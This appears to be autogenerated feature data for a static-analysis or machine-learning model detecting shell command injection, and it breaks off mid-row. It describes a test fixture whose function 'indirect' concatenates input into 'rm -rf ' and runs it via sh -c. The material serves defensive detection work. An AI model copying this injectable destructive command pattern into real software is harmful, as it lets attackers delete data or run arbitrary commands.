autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:27 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:27 | "rm -rf " + name | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:27 | "rm -rf " + name | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:27 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:24:149:27 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:24:149:27 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:24:149:27 | name | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:24:149:27 | name | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:24:149:27 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:24:149:27 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:7 | sh | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:7 | sh | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:7 | sh | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:7 | sh | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:7 | sh | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh = "sh" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh = "sh" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh = "sh" | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh = "sh" | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:6:150:14 | sh = "sh" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:11:150:14 | "sh" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:11:150:14 | "sh" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:11:150:14 | "sh" | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:11:150:14 | "sh" | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:150:11:150:14 | "sh" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:9 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:9 | args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:9 | args | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:9 | args | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:9 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args = ["-c", cmd] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args = ["-c", cmd] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args = ["-c", cmd] | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args = ["-c", cmd] | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:6:151:23 | args = ["-c", cmd] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:13:151:23 | ["-c", cmd] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:13:151:23 | ["-c", cmd] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:13:151:23 | ["-c", cmd] | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:13:151:23 | ["-c", cmd] | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:13:151:23 | ["-c", cmd] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:14:151:17 | "-c" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:151:20:151:22 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:3 | cp | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:3 | cp | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:9 | cp.spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:9 | cp.spawn | contextSurroundingFunctionParameters 